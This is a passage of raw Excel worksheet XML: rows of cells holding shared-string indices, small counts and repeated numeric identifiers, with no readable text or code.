      <c r="B18288" t="s">
        <v>16218</v>
      </c>
      <c r="C18288">
        <v>2</v>
      </c>
      <c r="D18288">
        <v>5509</v>
      </c>
    </row>
    <row r="18289" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18289" t="s">
        <v>16229</v>
      </c>
      <c r="B18289" t="s">
        <v>16219</v>
      </c>
      <c r="C18289">
        <v>0</v>
      </c>
      <c r="D18289">
        <v>5509</v>
      </c>
    </row>
    <row r="18290" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18290" t="s">
        <v>16230</v>
      </c>
      <c r="B18290" t="s">
        <v>16220</v>
      </c>
      <c r="C18290">
        <v>0</v>
      </c>
      <c r="D18290">
        <v>5509</v>
      </c>
    </row>
    <row r="18291" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18291" t="s">
        <v>16229</v>
      </c>
      <c r="B18291" t="s">
        <v>16221</v>
      </c>
      <c r="C18291">
        <v>0</v>
      </c>
      <c r="D18291">
        <v>5509</v>
      </c>
    </row>
    <row r="18292" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18292" t="s">
        <v>16230</v>
      </c>
      <c r="B18292" t="s">
        <v>16222</v>
      </c>
      <c r="C18292">
        <v>0</v>
      </c>
      <c r="D18292">
        <v>5509</v>
      </c>
    </row>
    <row r="18293" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18293" t="s">
        <v>16223</v>
      </c>
      <c r="B18293" t="s">
        <v>16223</v>
      </c>
      <c r="C18293">
        <v>30</v>
      </c>
      <c r="D18293">
        <v>5509</v>
      </c>
    </row>
    <row r="18294" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18294" t="s">
        <v>16224</v>
      </c>
      <c r="B18294" t="s">
        <v>16224</v>
      </c>
      <c r="C18294">
        <v>0</v>
      </c>
      <c r="D18294">
        <v>5509</v>
      </c>
    </row>
    <row r="18295" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18295" t="s">
        <v>16228</v>
      </c>
      <c r="B18295" t="s">
        <v>16211</v>
      </c>
      <c r="C18295">
        <v>0</v>
      </c>
      <c r="D18295">
        <v>1700</v>
      </c>
    </row>
    <row r="18296" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18296" t="s">
        <v>16231</v>
      </c>
      <c r="B18296" t="s">
        <v>16212</v>
      </c>
      <c r="C18296">
        <v>0</v>
      </c>
      <c r="D18296">
        <v>1700</v>
      </c>
    </row>
    <row r="18297" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18297" t="s">
        <v>16228</v>
      </c>
      <c r="B18297" t="s">
        <v>16213</v>
      </c>
      <c r="C18297">
        <v>0</v>
      </c>
      <c r="D18297">
        <v>1700</v>
      </c>
    </row>
    <row r="18298" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18298" t="s">
        <v>16231</v>
      </c>
      <c r="B18298" t="s">
        <v>16214</v>
      </c>
      <c r="C18298">
        <v>0</v>
      </c>
      <c r="D18298">
        <v>1700</v>
      </c>
    </row>
    <row r="18299" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18299" t="s">
        <v>16228</v>
      </c>
      <c r="B18299" t="s">
        <v>16215</v>
      </c>
      <c r="C18299">
        <v>3</v>
      </c>
      <c r="D18299">
        <v>1700</v>
      </c>
    </row>
    <row r="18300" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18300" t="s">
        <v>16231</v>
      </c>
      <c r="B18300" t="s">
        <v>16216</v>
      </c>
      <c r="C18300">
        <v>3</v>
      </c>
      <c r="D18300">
        <v>1700</v>
      </c>
    </row>
    <row r="18301" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18301" t="s">
        <v>16228</v>
      </c>
      <c r="B18301" t="s">
        <v>16217</v>
      </c>
      <c r="C18301">
        <v>10</v>
      </c>
      <c r="D18301">
        <v>1700</v>
      </c>
    </row>
    <row r="18302" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18302" t="s">
        <v>16231</v>
      </c>
      <c r="B18302" t="s">
        <v>16218</v>
      </c>
      <c r="C18302">
        <v>10</v>
      </c>
      <c r="D18302">
        <v>1700</v>
      </c>
    </row>
    <row r="18303" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18303" t="s">
        <v>16229</v>
      </c>
      <c r="B18303" t="s">
        <v>16219</v>
      </c>
      <c r="C18303">
        <v>0</v>
      </c>
      <c r="D18303">
        <v>1700</v>
      </c>
    </row>
    <row r="18304" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18304" t="s">
        <v>16230</v>
      </c>
      <c r="B18304" t="s">
        <v>16220</v>
      </c>
      <c r="C18304">
        <v>0</v>
      </c>
      <c r="D18304">
        <v>1700</v>
      </c>
    </row>
    <row r="18305" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18305" t="s">
        <v>16229</v>
      </c>
      <c r="B18305" t="s">
        <v>16221</v>
      </c>
      <c r="C18305">
        <v>4</v>
      </c>
      <c r="D18305">
        <v>1700</v>
      </c>
    </row>
    <row r="18306" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18306" t="s">
        <v>16230</v>
      </c>
      <c r="B18306" t="s">
        <v>16222</v>
      </c>
      <c r="C18306">
        <v>5</v>
      </c>
      <c r="D18306">
        <v>1700</v>
      </c>
    </row>
    <row r="18307" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18307" t="s">
        <v>16223</v>
      </c>
      <c r="B18307" t="s">
        <v>16223</v>
      </c>
      <c r="C18307">
        <v>25</v>
      </c>
      <c r="D18307">
        <v>1700</v>
      </c>
    </row>
    <row r="18308" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18308" t="s">
        <v>16224</v>
      </c>
      <c r="B18308" t="s">
        <v>16224</v>
      </c>
      <c r="C18308">
        <v>2</v>
      </c>
      <c r="D18308">
        <v>1700</v>
      </c>
    </row>
    <row r="18309" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18309" t="s">
        <v>16228</v>
      </c>
      <c r="B18309" t="s">
        <v>16211</v>
      </c>
      <c r="C18309">
        <v>0</v>
      </c>
      <c r="D18309">
        <v>5474</v>
      </c>
    </row>
    <row r="18310" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18310" t="s">
        <v>16231</v>
      </c>
      <c r="B18310" t="s">
        <v>16212</v>
      </c>
      <c r="C18310">
        <v>0</v>
      </c>
      <c r="D18310">
        <v>5474</v>
      </c>
    </row>
    <row r="18311" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18311" t="s">
        <v>16228</v>
      </c>
      <c r="B18311" t="s">
        <v>16213</v>
      </c>
      <c r="C18311">
        <v>0</v>
      </c>
      <c r="D18311">
        <v>5474</v>
      </c>
    </row>
    <row r="18312" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18312" t="s">
        <v>16231</v>
      </c>
      <c r="B18312" t="s">
        <v>16214</v>
      </c>
      <c r="C18312">
        <v>0</v>
      </c>
      <c r="D18312">
        <v>5474</v>
      </c>
    </row>
    <row r="18313" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18313" t="s">
        <v>16228</v>
      </c>
      <c r="B18313" t="s">
        <v>16215</v>
      </c>
      <c r="C18313">
        <v>2</v>
      </c>
      <c r="D18313">
        <v>5474</v>
      </c>
    </row>
    <row r="18314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18314" t="s">
        <v>16231</v>
      </c>
      <c r="B18314" t="s">
        <v>16216</v>
      </c>
      <c r="C18314">
        <v>0</v>
      </c>
      <c r="D18314">
        <v>5474</v>
      </c>
    </row>
    <row r="18315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18315" t="s">
        <v>16228</v>
      </c>
      <c r="B18315" t="s">
        <v>16217</v>
      </c>
      <c r="C18315">
        <v>0</v>
      </c>
      <c r="D18315">
        <v>5474</v>
      </c>
    </row>
    <row r="18316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18316" t="s">
        <v>16231</v>
      </c>
      <c r="B18316" t="s">
        <v>16218</v>
      </c>
      <c r="C18316">
        <v>0</v>
      </c>
      <c r="D18316">
        <v>5474</v>
      </c>
    </row>
    <row r="18317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18317" t="s">
        <v>16229</v>
      </c>
      <c r="B18317" t="s">
        <v>16219</v>
      </c>
      <c r="C18317">
        <v>3</v>
      </c>
      <c r="D18317">
        <v>5474</v>
      </c>
    </row>
    <row r="18318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18318" t="s">
        <v>16230</v>
      </c>
      <c r="B18318" t="s">
        <v>16220</v>
      </c>
      <c r="C18318">
        <v>0</v>
      </c>
      <c r="D18318">
        <v>5474</v>
      </c>
    </row>
    <row r="18319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18319" t="s">
        <v>16229</v>
      </c>
      <c r="B18319" t="s">
        <v>16221</v>
      </c>
      <c r="C18319">
        <v>0</v>
      </c>
      <c r="D18319">
        <v>5474</v>
      </c>
    </row>
    <row r="18320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18320" t="s">
        <v>16230</v>
      </c>
      <c r="B18320" t="s">
        <v>16222</v>
      </c>
      <c r="C18320">
        <v>0</v>
      </c>
      <c r="D18320">
        <v>5474</v>
      </c>
    </row>
    <row r="18321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18321" t="s">
        <v>16223</v>
      </c>
      <c r="B18321" t="s">
        <v>16223</v>
      </c>
      <c r="C18321">
        <v>27</v>
      </c>
      <c r="D18321">
        <v>5474</v>
      </c>
    </row>
    <row r="18322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18322" t="s">
        <v>16224</v>
      </c>
      <c r="B18322" t="s">
        <v>16224</v>
      </c>
      <c r="C18322">
        <v>0</v>
      </c>
      <c r="D18322">
        <v>5474</v>
      </c>
    </row>
    <row r="18323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18323" t="s">
        <v>16228</v>
      </c>
      <c r="B18323" t="s">
        <v>16211</v>
      </c>
      <c r="C18323">
        <v>0</v>
      </c>
      <c r="D18323">
        <v>1658</v>
      </c>
    </row>
    <row r="18324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18324" t="s">
        <v>16231</v>
      </c>
      <c r="B18324" t="s">
        <v>16212</v>
      </c>
      <c r="C18324">
        <v>0</v>
      </c>
      <c r="D18324">
        <v>1658</v>
      </c>
    </row>
    <row r="18325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18325" t="s">
        <v>16228</v>
      </c>
      <c r="B18325" t="s">
        <v>16213</v>
      </c>
      <c r="C18325">
        <v>0</v>
      </c>
      <c r="D18325">
        <v>1658</v>
      </c>
    </row>
    <row r="18326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18326" t="s">
        <v>16231</v>
      </c>
      <c r="B18326" t="s">
        <v>16214</v>
      </c>
      <c r="C18326">
        <v>0</v>
      </c>
      <c r="D18326">
        <v>1658</v>
      </c>
    </row>
    <row r="18327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18327" t="s">
        <v>16228</v>
      </c>
      <c r="B18327" t="s">
        <v>16215</v>
      </c>
      <c r="C18327">
        <v>2</v>
      </c>
      <c r="D18327">
        <v>1658</v>
      </c>
    </row>
    <row r="18328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18328" t="s">
        <v>16231</v>
      </c>
      <c r="B18328" t="s">
        <v>16216</v>
      </c>
      <c r="C18328">
        <v>0</v>
      </c>
      <c r="D18328">
        <v>1658</v>
      </c>
    </row>
    <row r="18329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18329" t="s">
        <v>16228</v>
      </c>
      <c r="B18329" t="s">
        <v>16217</v>
      </c>
      <c r="C18329">
        <v>0</v>
      </c>
      <c r="D18329">
        <v>1658</v>
      </c>
    </row>
    <row r="18330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18330" t="s">
        <v>16231</v>
      </c>
      <c r="B18330" t="s">
        <v>16218</v>
      </c>
      <c r="C18330">
        <v>0</v>
      </c>
      <c r="D18330">
        <v>1658</v>
      </c>
    </row>
    <row r="18331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18331" t="s">
        <v>16229</v>
      </c>
      <c r="B18331" t="s">
        <v>16219</v>
      </c>
      <c r="C18331">
        <v>2</v>
      </c>
      <c r="D18331">
        <v>1658</v>
      </c>
    </row>
    <row r="18332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18332" t="s">
        <v>16230</v>
      </c>
      <c r="B18332" t="s">
        <v>16220</v>
      </c>
      <c r="C18332">
        <v>2</v>
      </c>
      <c r="D18332">
        <v>1658</v>
      </c>
    </row>
    <row r="18333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18333" t="s">
        <v>16229</v>
      </c>
      <c r="B18333" t="s">
        <v>16221</v>
      </c>
      <c r="C18333">
        <v>0</v>
      </c>
      <c r="D18333">
        <v>1658</v>
      </c>
    </row>
    <row r="18334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18334" t="s">
        <v>16230</v>
      </c>
      <c r="B18334" t="s">
        <v>16222</v>
      </c>
      <c r="C18334">
        <v>2</v>
      </c>
      <c r="D18334">
        <v>1658</v>
      </c>
    </row>
    <row r="18335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18335" t="s">
        <v>16223</v>
      </c>
      <c r="B18335" t="s">
        <v>16223</v>
      </c>
      <c r="C18335">
        <v>25</v>
      </c>
      <c r="D18335">
        <v>1658</v>
      </c>
    </row>
    <row r="18336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18336" t="s">
        <v>16224</v>
      </c>
      <c r="B18336" t="s">
        <v>16224</v>
      </c>
      <c r="C18336">
        <v>0</v>
      </c>
      <c r="D18336">
        <v>1658</v>
      </c>
    </row>
    <row r="18337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18337" t="s">
        <v>16230</v>
      </c>
      <c r="B18337" t="s">
        <v>16222</v>
      </c>
      <c r="C18337">
        <v>0</v>
      </c>
      <c r="D18337">
        <v>1658</v>
      </c>
    </row>
    <row r="18338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18338" t="s">
        <v>16228</v>
      </c>
      <c r="B18338" t="s">
        <v>16211</v>
      </c>
      <c r="C18338">
        <v>0</v>
      </c>
      <c r="D18338">
        <v>5465</v>
      </c>
    </row>
    <row r="18339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18339" t="s">
        <v>16231</v>
      </c>
      <c r="B18339" t="s">
        <v>16212</v>
      </c>
      <c r="C18339">
        <v>0</v>
      </c>
      <c r="D18339">
        <v>5465</v>
      </c>
    </row>
    <row r="18340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18340" t="s">
        <v>16228</v>
      </c>
      <c r="B18340" t="s">
        <v>16213</v>
      </c>
      <c r="C18340">
        <v>0</v>
      </c>
      <c r="D18340">
        <v>5465</v>
      </c>
    </row>
    <row r="18341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18341" t="s">
        <v>16231</v>
      </c>
      <c r="B18341" t="s">
        <v>16214</v>
      </c>
      <c r="C18341">
        <v>0</v>
      </c>
      <c r="D18341">
        <v>5465</v>
      </c>
    </row>
    <row r="18342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18342" t="s">
        <v>16228</v>
      </c>
      <c r="B18342" t="s">
        <v>16215</v>
      </c>
      <c r="C18342">
        <v>10</v>
      </c>
      <c r="D18342">
        <v>5465</v>
      </c>
    </row>
    <row r="18343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18343" t="s">
        <v>16231</v>
      </c>
      <c r="B18343" t="s">
        <v>16216</v>
      </c>
      <c r="C18343">
        <v>7</v>
      </c>
      <c r="D18343">
        <v>5465</v>
      </c>
    </row>
    <row r="18344" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18344" t="s">
        <v>16228</v>
      </c>
      <c r="B18344" t="s">
        <v>16217</v>
      </c>
      <c r="C18344">
        <v>7</v>
      </c>
      <c r="D18344">
        <v>5465</v>
      </c>
    </row>
    <row r="18345" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18345" t="s">
        <v>16231</v>
      </c>
      <c r="B18345" t="s">
        <v>16218</v>
      </c>
      <c r="C18345">
        <v>0</v>
      </c>
      <c r="D18345">
        <v>5465</v>
      </c>
    </row>
    <row r="18346" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18346" t="s">
        <v>16229</v>
      </c>
      <c r="B18346" t="s">
        <v>16219</v>
      </c>
      <c r="C18346">
        <v>0</v>
      </c>
      <c r="D18346">
        <v>5465</v>
      </c>
    </row>
    <row r="18347" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18347" t="s">
        <v>16230</v>
      </c>
      <c r="B18347" t="s">
        <v>16220</v>
      </c>
      <c r="C18347">
        <v>0</v>
      </c>
      <c r="D18347">
        <v>5465</v>
      </c>
    </row>
    <row r="18348" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18348" t="s">
        <v>16229</v>
      </c>
      <c r="B18348" t="s">
        <v>16221</v>
      </c>
      <c r="C18348">
        <v>0</v>
      </c>
      <c r="D18348">
        <v>5465</v>
      </c>
    </row>
    <row r="18349" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18349" t="s">
        <v>16230</v>
      </c>
      <c r="B18349" t="s">
        <v>16222</v>
      </c>
      <c r="C18349">
        <v>0</v>
      </c>
      <c r="D18349">
        <v>5465</v>
      </c>
    </row>
    <row r="18350" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18350" t="s">
        <v>16223</v>
      </c>
      <c r="B18350" t="s">
        <v>16223</v>
      </c>
      <c r="C18350">
        <v>28</v>
      </c>
      <c r="D18350">
        <v>5465</v>
      </c>
    </row>
    <row r="18351" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18351" t="s">
        <v>16224</v>
      </c>
      <c r="B18351" t="s">
        <v>16224</v>
      </c>
      <c r="C18351">
        <v>1</v>
      </c>
      <c r="D18351">
        <v>5465</v>
      </c>
    </row>
    <row r="18352" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18352" t="s">
        <v>16228</v>
      </c>
      <c r="B18352" t="s">
        <v>16211</v>
      </c>
      <c r="C18352">
        <v>0</v>
      </c>
      <c r="D18352">
        <v>1835</v>
      </c>
    </row>
    <row r="18353" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18353" t="s">
        <v>16231</v>
      </c>
      <c r="B18353" t="s">
        <v>16212</v>
      </c>
      <c r="C18353">
        <v>0</v>
      </c>
      <c r="D18353">
        <v>1835</v>
      </c>
    </row>
    <row r="18354" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18354" t="s">
        <v>16228</v>
      </c>
      <c r="B18354" t="s">
        <v>16213</v>
      </c>
      <c r="C18354">
        <v>0</v>
      </c>
      <c r="D18354">
        <v>1835</v>
      </c>
    </row>
    <row r="18355" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18355" t="s">
        <v>16231</v>
      </c>
      <c r="B18355" t="s">
        <v>16214</v>
      </c>
      <c r="C18355">
        <v>0</v>
      </c>
      <c r="D18355">
        <v>1835</v>
      </c>
    </row>
    <row r="18356" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18356" t="s">
        <v>16228</v>
      </c>
      <c r="B18356" t="s">
        <v>16215</v>
      </c>
      <c r="C18356">
        <v>3</v>
      </c>
      <c r="D18356">
        <v>1835</v>
      </c>
    </row>
    <row r="18357" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18357" t="s">
        <v>16231</v>
      </c>
      <c r="B18357" t="s">
        <v>16216</v>
      </c>
      <c r="C18357">
        <v>1</v>
      </c>
      <c r="D18357">
        <v>1835</v>
      </c>
    </row>
    <row r="18358" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18358" t="s">
        <v>16228</v>
      </c>
      <c r="B18358" t="s">
        <v>16217</v>
      </c>
      <c r="C18358">
        <v>0</v>
      </c>
      <c r="D18358">
        <v>1835</v>
      </c>
    </row>
    <row r="18359" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18359" t="s">
        <v>16231</v>
      </c>
      <c r="B18359" t="s">
        <v>16218</v>
      </c>
      <c r="C18359">
        <v>3</v>
      </c>
      <c r="D18359">
        <v>1835</v>
      </c>
    </row>
    <row r="18360" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18360" t="s">
        <v>16229</v>
      </c>
      <c r="B18360" t="s">
        <v>16219</v>
      </c>
      <c r="C18360">
        <v>0</v>
      </c>
      <c r="D18360">
        <v>1835</v>
      </c>
    </row>
    <row r="18361" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18361" t="s">
        <v>16230</v>
      </c>
      <c r="B18361" t="s">
        <v>16220</v>
      </c>
      <c r="C18361">
        <v>0</v>
      </c>
      <c r="D18361">
        <v>1835</v>
      </c>
    </row>
    <row r="18362" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18362" t="s">
        <v>16229</v>
      </c>
      <c r="B18362" t="s">
        <v>16221</v>
      </c>
      <c r="C18362">
        <v>0</v>
      </c>
      <c r="D18362">
        <v>1835</v>
      </c>
    </row>
    <row r="18363" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18363" t="s">
        <v>16230</v>
      </c>
      <c r="B18363" t="s">
        <v>16222</v>
      </c>
      <c r="C18363">
        <v>2</v>
      </c>
      <c r="D18363">
        <v>1835</v>
      </c>
    </row>
    <row r="18364" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18364" t="s">
        <v>16223</v>
      </c>
      <c r="B18364" t="s">
        <v>16223</v>
      </c>
      <c r="C18364">
        <v>20</v>
      </c>
      <c r="D18364">
        <v>1835</v>
      </c>
    </row>
    <row r="18365" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18365" t="s">
        <v>16224</v>
      </c>
      <c r="B18365" t="s">
        <v>16224</v>
      </c>
      <c r="C18365">
        <v>0</v>
      </c>
      <c r="D18365">
        <v>1835</v>
      </c>
    </row>
    <row r="18366" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18366" t="s">
        <v>16228</v>
      </c>
      <c r="B18366" t="s">
        <v>16211</v>
      </c>
      <c r="C18366">
        <v>0</v>
      </c>
      <c r="D18366">
        <v>5200</v>
      </c>
    </row>
    <row r="18367" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18367" t="s">
        <v>16231</v>
      </c>
      <c r="B18367" t="s">
        <v>16212</v>
      </c>
      <c r="C18367">
        <v>0</v>
      </c>
      <c r="D18367">
        <v>5200</v>
      </c>
    </row>
    <row r="18368" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18368" t="s">
        <v>16228</v>
      </c>
      <c r="B18368" t="s">
        <v>16213</v>
      </c>
      <c r="C18368">
        <v>0</v>
      </c>
      <c r="D18368">
        <v>5200</v>
      </c>
    </row>
    <row r="18369" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18369" t="s">
        <v>16231</v>
      </c>
      <c r="B18369" t="s">
        <v>16214</v>
      </c>
      <c r="C18369">
        <v>0</v>
      </c>
      <c r="D18369">
        <v>5200</v>
      </c>
    </row>
    <row r="18370" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18370" t="s">
        <v>16228</v>
      </c>
      <c r="B18370" t="s">
        <v>16215</v>
      </c>
      <c r="C18370">
        <v>20</v>
      </c>
      <c r="D18370">
        <v>5200</v>
      </c>
    </row>
    <row r="18371" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18371" t="s">
        <v>16231</v>
      </c>
      <c r="B18371" t="s">
        <v>16216</v>
      </c>
      <c r="C18371">
        <v>18</v>
      </c>
      <c r="D18371">
        <v>5200</v>
      </c>
    </row>
    <row r="18372" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18372" t="s">
        <v>16228</v>
      </c>
      <c r="B18372" t="s">
        <v>16217</v>
      </c>
      <c r="C18372">
        <v>0</v>
      </c>
      <c r="D18372">
        <v>5200</v>
      </c>
    </row>
    <row r="18373" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18373" t="s">
        <v>16231</v>
      </c>
      <c r="B18373" t="s">
        <v>16218</v>
      </c>
      <c r="C18373">
        <v>0</v>
      </c>
      <c r="D18373">
        <v>5200</v>
      </c>
    </row>
    <row r="18374" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18374" t="s">
        <v>16229</v>
      </c>
      <c r="B18374" t="s">
        <v>16219</v>
      </c>
      <c r="C18374">
        <v>70</v>
      </c>
      <c r="D18374">
        <v>5200</v>
      </c>
    </row>
    <row r="18375" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18375" t="s">
        <v>16230</v>
      </c>
      <c r="B18375" t="s">
        <v>16220</v>
      </c>
      <c r="C18375">
        <v>9</v>
      </c>
      <c r="D18375">
        <v>5200</v>
      </c>
    </row>
    <row r="18376" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18376" t="s">
        <v>16229</v>
      </c>
      <c r="B18376" t="s">
        <v>16221</v>
      </c>
      <c r="C18376">
        <v>0</v>
      </c>
      <c r="D18376">
        <v>5200</v>
      </c>
    </row>
    <row r="18377" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18377" t="s">
        <v>16230</v>
      </c>
      <c r="B18377" t="s">
        <v>16222</v>
      </c>
      <c r="C18377">
        <v>0</v>
      </c>
      <c r="D18377">
        <v>5200</v>
      </c>
    </row>
    <row r="18378" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18378" t="s">
        <v>16223</v>
      </c>
      <c r="B18378" t="s">
        <v>16223</v>
      </c>
      <c r="C18378">
        <v>25</v>
      </c>
      <c r="D18378">
        <v>5200</v>
      </c>
    </row>
    <row r="18379" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18379" t="s">
        <v>16224</v>
      </c>
      <c r="B18379" t="s">
        <v>16224</v>
      </c>
      <c r="C18379">
        <v>0</v>
      </c>
      <c r="D18379">
        <v>5200</v>
      </c>
    </row>
    <row r="18380" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18380" t="s">
        <v>16228</v>
      </c>
      <c r="B18380" t="s">
        <v>16211</v>
      </c>
      <c r="C18380">
        <v>0</v>
      </c>
      <c r="D18380">
        <v>1771</v>
      </c>
    </row>
    <row r="18381" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18381" t="s">
        <v>16231</v>
      </c>
      <c r="B18381" t="s">
        <v>16212</v>
      </c>
      <c r="C18381">
        <v>0</v>
      </c>
      <c r="D18381">
        <v>1771</v>
      </c>
    </row>
    <row r="18382" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18382" t="s">
        <v>16228</v>
      </c>
      <c r="B18382" t="s">
        <v>16213</v>
      </c>
      <c r="C18382">
        <v>0</v>
      </c>
      <c r="D18382">
        <v>1771</v>
      </c>
    </row>
    <row r="18383" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18383" t="s">
        <v>16231</v>
      </c>
      <c r="B18383" t="s">
        <v>16214</v>
      </c>
      <c r="C18383">
        <v>0</v>
      </c>
      <c r="D18383">
        <v>1771</v>
      </c>
    </row>
    <row r="18384" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18384" t="s">
        <v>16228</v>
      </c>
      <c r="B18384" t="s">
        <v>16215</v>
      </c>
      <c r="C18384">
        <v>1</v>
      </c>
      <c r="D18384">
        <v>1771</v>
      </c>
    </row>
    <row r="18385" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18385" t="s">
        <v>16231</v>
      </c>
      <c r="B18385" t="s">
        <v>16216</v>
      </c>
      <c r="C18385">
        <v>1</v>
      </c>
      <c r="D18385">
        <v>1771</v>
      </c>
    </row>
    <row r="18386" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18386" t="s">
        <v>16228</v>
      </c>
      <c r="B18386" t="s">
        <v>16217</v>
      </c>
      <c r="C18386">
        <v>5</v>
      </c>
      <c r="D18386">
        <v>1771</v>
      </c>
    </row>
    <row r="18387" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18387" t="s">
        <v>16231</v>
      </c>
      <c r="B18387" t="s">
        <v>16218</v>
      </c>
      <c r="C18387">
        <v>5</v>
      </c>
      <c r="D18387">
        <v>1771</v>
      </c>
    </row>
    <row r="18388" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18388" t="s">
        <v>16229</v>
      </c>
      <c r="B18388" t="s">
        <v>16219</v>
      </c>
      <c r="C18388">
        <v>0</v>
      </c>
      <c r="D18388">
        <v>1771</v>
      </c>
    </row>
    <row r="18389" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18389" t="s">
        <v>16230</v>
      </c>
      <c r="B18389" t="s">
        <v>16220</v>
      </c>
      <c r="C18389">
        <v>0</v>
      </c>
      <c r="D18389">
        <v>1771</v>
      </c>
    </row>
    <row r="18390" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18390" t="s">
        <v>16229</v>
      </c>
      <c r="B18390" t="s">
        <v>16221</v>
      </c>
      <c r="C18390">
        <v>4</v>
      </c>
      <c r="D18390">
        <v>1771</v>
      </c>
    </row>
    <row r="18391" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18391" t="s">
        <v>16230</v>
      </c>
      <c r="B18391" t="s">
        <v>16222</v>
      </c>
      <c r="C18391">
        <v>5</v>
      </c>
      <c r="D18391">
        <v>1771</v>
      </c>
    </row>
    <row r="18392" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18392" t="s">
        <v>16223</v>
      </c>
      <c r="B18392" t="s">
        <v>16223</v>
      </c>
      <c r="C18392">
        <v>25</v>
      </c>
      <c r="D18392">
        <v>1771</v>
      </c>
    </row>
    <row r="18393" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18393" t="s">
